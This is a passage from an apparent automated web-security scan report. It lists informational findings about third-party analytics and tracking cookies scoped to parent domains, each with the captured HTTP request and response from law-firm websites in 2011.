17.7. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A9%3A13%204%20300&ce=UTF-8&ns=findlaw&pageName=www.nldhlaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.nldhlaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DNelson%2BLevine%2BdeLuca%2B%2526%2BHorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.nldhlaw.com&server=Firmsite&events=event41%3A1305216553783-24404%2Cevent1%2Cevent27&c1=www.nldhlaw.com&v1=D%3Dc1&h1=www.nldhlaw.com&c2=www.nldhlaw.com&v2=D%3Dc2&c3=www.nldhlaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.nldhlaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Enelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c11=n%2Fa%20%7C%20www.nldhlaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20nelson%2Blevine%2Bdeluca%2B%26%2Bhorst%20%7C%20www.nldhlaw.com%3Ahome%20page&v12=D%3Dc12&c18=24404&v18=24404&c19=24404-2011m5&v19=D%3Dc19&c20=1272517&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dnelson%2Blevine%2Bdeluca%2B%2526%2Bhorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=nelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c50=findlaw-16733&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:10:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E60334051D33E5-6000012A40014AB2[CE]; Expires=Tue, 10 May 2016 16:10:16 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943?AQB=1&pccr=true&vidn=26E60334051D33E5-6000012A40014AB2&&ndh=1&t=12%2F4%2F2011%2011%3A9%3A13%204%20300&ce=UTF-8&ns=findlaw&pageName=www.nldhlaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.nldhlaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DNelson%2BLevine%2BdeLuca%2B%2526%2BHorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.nldhlaw.com&server=Firmsite&events=event41%3A1305216553783-24404%2Cevent1%2Cevent27&c1=www.nldhlaw.com&v1=D%3Dc1&h1=www.nldhlaw.com&c2=www.nldhlaw.com&v2=D%3Dc2&c3=www.nldhlaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.nldhlaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Enelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c11=n%2Fa%20%7C%20www.nldhlaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20nelson%2Blevine%2Bdeluca%2B%26%2Bhorst%20%7C%20www.nldhlaw.com%3Ahome%20page&v12=D%3Dc12&c18=24404&v18=24404&c19=24404-2011m5&v19=D%3Dc19&c20=1272517&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dnelson%2Blevine%2Bdeluca%2B%2526%2Bhorst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=nelson%2Blevine%2Bdeluca%2B%26%2Bhorst&c50=findlaw-16733&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:10:16 GMT
Last-Modified: Fri, 13 May 2011 16:10:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain

17.8. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1956180586&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.superlawyers.com%252Fpennsylvania%252Flawyer%252FGlenn-A-Ellis%252F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html%26jsref%3Dhttp%253A%252F%252Flayserfreiwald.com%252Fattorneys.html%253Fmode%253Dview%2526AID%253D8%26rnd%3D1305225348465&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&jsref=http%3A%2F%2Flayserfreiwald.com%2Fattorneys.html%3Fmode%3Dview%26AID%3D8&rnd=1305225348465
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 18:35:49 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 18:35:49 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

17.9. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=4003536&resolution=1920&h=1200&camefrom=http%3A//www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators&u=http%3A//www.glaala.org/clubportal/glaala/index.cfm&t=legal%20administrator%2C%20ala%2C%20GLA%2C%20los%20angeles%20-&java=1&security=24b78521&sc_random=0.6984565668166883&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.glaala.org/clubportal/glaala/index.cfm
Cookie: is_unique=sc4658975.1305126718.0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:09:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc4658975.1305126718.0-4003536.1305223761.0; expires=Tue, 10-May-2016 18:09:21 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
17.10. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=5&gen=100&sid=4dcc04a295bfe7b7&callback=_ate.ad.hrr&pub=xa-4b4b96e85d543881&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2F&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DTydings%2B%2526%2BRosenberg%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&1i51wom HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 12 May 2011 16:02:43 GMT
Set-Cookie: di=1305201657.1OD|1305200976.60|1305200976.1FE; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:02:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11-Jun-2011 16:02:43 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Thu, 12 May 2011 16:02:43 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
17.11. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6x0063o010k03505; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; acs=014020a0g0h1lkaebsxzt1sl6xxzt1sl6xxzt1p28s; rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2zip000000013o01; sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000013o010k0150156bll2zip000000013o010k01501ag2lkmm960gd9j0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1f0053o010k03505ahhll2zip000000013o010k015010klll12l401wxl0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2zip000000013o010k01501alhll2zip000000013o010k01501dg4lkmhha0gi1f0043n000k00500942ll2zip000000013o010k01501943lkzgkk03iy50023n000k00500

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1lkaebsxzt1sxc7xzt1sxc7xzt1sxc7xzt1sxc7xzt1sxc7; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sxc70073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4051196ll3bnz000000013o011194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: sglst=20p0sarrll12l401wxl0013n000k00500ag2lkmm960gpet0053o020k045059rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500a6rlkmhha0cz3a0023f000j005000klll12l40292v0033o020k035034xcll3bnz000000013o010k01501bvsll3bnz000000013o010k01501dlell12l40292v0033o020k03503abflkmhha0cz3a0023f000j00500bo0ll2zip00c5a0023o020k025025eell3bnz000000013o010k01501alhll2zip00c5a0023o020k02502dg4lkmhha0gi1f0043n000k0050064yll3bnz000000013o010k01501942ll2zip00c5a0023o020k02502943lkzgkk03iy50023n000k005009ullkzgkk03v3f0033o010k02502c25ll2zip00c5a0023o020k0250256all3bnz000000013o010k0150156bll2zip000000023o020k025020tilkmhha0gu6p0063o020k04506cgzlkmhha0gi1f0043n000k00500ahhll2zip00c5a0023o020k02502; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: vstcnt=417s010r054sbno118e10f24smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p20d20e2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=1xcfgwn0ixqhg
Content-Length: 0
Date: Thu, 12 May 2011 16:11:58 GMT

17.12. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcases.html%3Faction%3DcaseDetail%26CaseID%3D102&g0rr6z HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 214
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 17:03:35 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 17:03:35 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219815.1EY; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:59:25 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 17:03:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 17:03:35 GMT
Connection: close

_ate.ad.hpr({"urls":["http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/39CD8FF4-531A-4266-A340-45548C451F45/User/4dc048d9159e4ae3/gif"],"segments" : ["1EY"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxM
...[SNIP]...
17.13. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 510
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:11:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:11:57 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:11:57 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degree
...[SNIP]...
17.14. http://ehg-findlaw.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=wp151&hb=WR540427EECA%3BDM54040296DE&cd=1&hv=6&n=/Employment-Claims-Labor-Relations.asp%3B/SITE%20PAGE&con=&vcon=/PracticeAreas%3B/2069028/powelltrachtman2/www.powelltrachtman.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305218555000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.powelltrachtman.com/&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp
Cookie: CTG=1305216636; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrze^"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eeXe"%XrQB%eQe@^%riQX"%^zNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6X6r"V6%6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(A6%Q%%Q%e6Z_fG~Ik6kkk|Z_fG~Ik|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eQe@"%XrQB%eQe@^%riQX"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQz%zrzr"%XrQB%ee%@z%XrQB%ee%@"%XrQB%ee%@"%XrQB%ee%@rBrQCQ"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[#a~F:TxBr0aq2TaxBr_a0DcIxBrxBQBexBr':hFfxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR561118HFRZV6=V1rrrrr"rz%XrQB%eeXeBrreeBz%zrzr"%XrQB%eeXez%XrQB%eeXe"%XrQB%eeXe"%XrQB%eeXeBrreeB"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[MIcdF:TxBr[alIhc:xBr82_DFxBrYacdaTGIDWOxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:38 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zr"%XrQB%iQQiz%XrQB%eQe@"%XrQB%iQQi"%XrQB%iQQiQere@e"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Set-Cookie: CTG=1305218558; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:42:38 GMT; max-age=604800
